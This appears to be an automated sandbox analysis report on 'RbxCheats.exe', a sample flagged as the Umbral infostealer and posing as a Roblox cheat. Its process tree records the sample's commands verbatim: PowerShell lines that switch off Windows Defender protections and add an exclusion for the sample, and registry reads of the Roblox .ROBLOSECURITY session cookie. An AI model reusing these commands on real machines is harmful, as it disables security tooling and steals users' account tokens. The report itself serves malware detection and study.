Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
07/08/2023, 19:00
Behavioral task
behavioral1
Sample
RbxCheats.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
RbxCheats.exe
Resource
win10v2004-20230703-en
General
-
Target
RbxCheats.exe
-
Size
217KB
-
MD5
84fe5aaf9d71e59205c851af53d6a1c7
-
SHA1
1b93e136c567dce28cccd900a02b694d9f488d86
-
SHA256
81046d6d4e474115dd898d8e4718bc2ba144928461baa26e23f26d73d8e3f2f7
-
SHA512
db3bfcbccd1b6e22754fd40841f2b2f0d229852879ab1c10e214d8185e5c29f8a8d3e318182c80a2887cf77f7e59aa3e95088b2901eb96720afd9e4f7d775a2d
-
SSDEEP
3072:WlP/chtWkOIGSAvD6vdnsUSaNZZDOAuIXk0IIIIIIEIIIIIIIIIIIlTIIIIIIIII:OcyHIGadsUSsZDO7+8eNHpDS
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2072-54-0x0000000000B10000-0x0000000000B4C000-memory.dmp family_umbral -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1688 wmic.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 2840 powershell.exe 2960 powershell.exe 2784 powershell.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 1696 powershell.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 1080 powershell.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 892 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2072 RbxCheats.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 2960 powershell.exe Token: SeDebugPrivilege 2784 powershell.exe Token: SeDebugPrivilege 892 taskmgr.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeIncreaseQuotaPrivilege 1952 wmic.exe Token: SeSecurityPrivilege 1952 wmic.exe Token: SeTakeOwnershipPrivilege 1952 wmic.exe Token: SeLoadDriverPrivilege 1952 wmic.exe Token: SeSystemProfilePrivilege 1952 wmic.exe Token: SeSystemtimePrivilege 1952 wmic.exe Token: SeProfSingleProcessPrivilege 1952 wmic.exe Token: SeIncBasePriorityPrivilege 1952 wmic.exe Token: SeCreatePagefilePrivilege 1952 wmic.exe Token: SeBackupPrivilege 1952 wmic.exe Token: SeRestorePrivilege 1952 wmic.exe Token: SeShutdownPrivilege 1952 wmic.exe Token: SeDebugPrivilege 1952 wmic.exe Token: SeSystemEnvironmentPrivilege 1952 wmic.exe Token: SeRemoteShutdownPrivilege 1952 wmic.exe Token: SeUndockPrivilege 1952 wmic.exe Token: SeManageVolumePrivilege 1952 wmic.exe Token: 33 1952 wmic.exe Token: 34 1952 wmic.exe Token: 35 1952 wmic.exe Token: SeIncreaseQuotaPrivilege 1952 wmic.exe Token: SeSecurityPrivilege 1952 wmic.exe Token: SeTakeOwnershipPrivilege 1952 wmic.exe Token: SeLoadDriverPrivilege 1952 wmic.exe Token: SeSystemProfilePrivilege 1952 wmic.exe Token: SeSystemtimePrivilege 1952 wmic.exe Token: SeProfSingleProcessPrivilege 1952 wmic.exe Token: SeIncBasePriorityPrivilege 1952 wmic.exe Token: SeCreatePagefilePrivilege 1952 wmic.exe Token: SeBackupPrivilege 1952 wmic.exe Token: SeRestorePrivilege 1952 wmic.exe Token: SeShutdownPrivilege 1952 wmic.exe Token: SeDebugPrivilege 1952 wmic.exe Token: SeSystemEnvironmentPrivilege 1952 wmic.exe Token: SeRemoteShutdownPrivilege 1952 wmic.exe Token: SeUndockPrivilege 1952 wmic.exe Token: SeManageVolumePrivilege 1952 wmic.exe Token: 33 1952 wmic.exe Token: 34 1952 wmic.exe Token: 35 1952 wmic.exe Token: SeIncreaseQuotaPrivilege 1596 wmic.exe Token: SeSecurityPrivilege 1596 wmic.exe Token: SeTakeOwnershipPrivilege 1596 wmic.exe Token: SeLoadDriverPrivilege 1596 wmic.exe Token: SeSystemProfilePrivilege 1596 wmic.exe Token: SeSystemtimePrivilege 1596 wmic.exe Token: SeProfSingleProcessPrivilege 1596 wmic.exe Token: SeIncBasePriorityPrivilege 1596 wmic.exe Token: SeCreatePagefilePrivilege 1596 wmic.exe Token: SeBackupPrivilege 1596 wmic.exe Token: SeRestorePrivilege 1596 wmic.exe Token: SeShutdownPrivilege 1596 wmic.exe Token: SeDebugPrivilege 1596 wmic.exe Token: SeSystemEnvironmentPrivilege 1596 wmic.exe Token: SeRemoteShutdownPrivilege 1596 wmic.exe Token: SeUndockPrivilege 1596 wmic.exe Token: SeManageVolumePrivilege 1596 wmic.exe Token: 33 1596 wmic.exe -
Suspicious use of FindShellTrayWindow 56 IoCs
pid Process 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe -
Suspicious use of SendNotifyMessage 55 IoCs
pid Process 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2072 wrote to memory of 2840 2072 RbxCheats.exe 28 PID 2072 wrote to memory of 2840 2072 RbxCheats.exe 28 PID 2072 wrote to memory of 2840 2072 RbxCheats.exe 28 PID 2072 wrote to memory of 2960 2072 RbxCheats.exe 30 PID 2072 wrote to memory of 2960 2072 RbxCheats.exe 30 PID 2072 wrote to memory of 2960 2072 RbxCheats.exe 30 PID 2072 wrote to memory of 2784 2072 RbxCheats.exe 32 PID 2072 wrote to memory of 2784 2072 RbxCheats.exe 32 PID 2072 wrote to memory of 2784 2072 RbxCheats.exe 32 PID 2072 wrote to memory of 1696 2072 RbxCheats.exe 35 PID 2072 wrote to memory of 1696 2072 RbxCheats.exe 35 PID 2072 wrote to memory of 1696 2072 RbxCheats.exe 35 PID 2072 wrote to memory of 1952 2072 RbxCheats.exe 37 PID 2072 wrote to memory of 1952 2072 RbxCheats.exe 37 PID 2072 wrote to memory of 1952 2072 RbxCheats.exe 37 PID 2072 wrote to memory of 1596 2072 RbxCheats.exe 40 PID 2072 wrote to memory of 1596 2072 RbxCheats.exe 40 PID 2072 wrote to memory of 1596 2072 RbxCheats.exe 40 PID 2072 wrote to memory of 1644 2072 RbxCheats.exe 42 PID 2072 wrote to memory of 1644 2072 RbxCheats.exe 42 PID 2072 wrote to memory of 1644 2072 RbxCheats.exe 42 PID 2072 wrote to memory of 1080 2072 RbxCheats.exe 44 PID 2072 wrote to memory of 1080 2072 RbxCheats.exe 44 PID 2072 wrote to memory of 1080 2072 RbxCheats.exe 44 PID 2072 wrote to memory of 1688 2072 RbxCheats.exe 47 PID 2072 wrote to memory of 1688 2072 RbxCheats.exe 47 PID 2072 wrote to memory of 1688 2072 RbxCheats.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\RbxCheats.exe"C:\Users\Admin\AppData\Local\Temp\RbxCheats.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RbxCheats.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1080
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1688
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:892
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5aa42b61ddb7f80f9f4b69050a53bd8d9
SHA125269901ecadebcbc551538b53e6a73963b23767
SHA2568dee81cfa9d8515edd0d9670f9971dbbe8c0ee293fb0ed4d6dcd79c9d95615f6
SHA512f9378b2bd3064e0a21d79f10c246087540400b9dd48a212a782c1e0026ef9454dda2849547d92fbbc14fa075552fc9e421bfb83f4fb0c85862decaacdd9137dc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5aa42b61ddb7f80f9f4b69050a53bd8d9
SHA125269901ecadebcbc551538b53e6a73963b23767
SHA2568dee81cfa9d8515edd0d9670f9971dbbe8c0ee293fb0ed4d6dcd79c9d95615f6
SHA512f9378b2bd3064e0a21d79f10c246087540400b9dd48a212a782c1e0026ef9454dda2849547d92fbbc14fa075552fc9e421bfb83f4fb0c85862decaacdd9137dc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5aa42b61ddb7f80f9f4b69050a53bd8d9
SHA125269901ecadebcbc551538b53e6a73963b23767
SHA2568dee81cfa9d8515edd0d9670f9971dbbe8c0ee293fb0ed4d6dcd79c9d95615f6
SHA512f9378b2bd3064e0a21d79f10c246087540400b9dd48a212a782c1e0026ef9454dda2849547d92fbbc14fa075552fc9e421bfb83f4fb0c85862decaacdd9137dc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5aa42b61ddb7f80f9f4b69050a53bd8d9
SHA125269901ecadebcbc551538b53e6a73963b23767
SHA2568dee81cfa9d8515edd0d9670f9971dbbe8c0ee293fb0ed4d6dcd79c9d95615f6
SHA512f9378b2bd3064e0a21d79f10c246087540400b9dd48a212a782c1e0026ef9454dda2849547d92fbbc14fa075552fc9e421bfb83f4fb0c85862decaacdd9137dc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PH8Z2M3EY89U8GEPXUWL.temp
Filesize7KB
MD5aa42b61ddb7f80f9f4b69050a53bd8d9
SHA125269901ecadebcbc551538b53e6a73963b23767
SHA2568dee81cfa9d8515edd0d9670f9971dbbe8c0ee293fb0ed4d6dcd79c9d95615f6
SHA512f9378b2bd3064e0a21d79f10c246087540400b9dd48a212a782c1e0026ef9454dda2849547d92fbbc14fa075552fc9e421bfb83f4fb0c85862decaacdd9137dc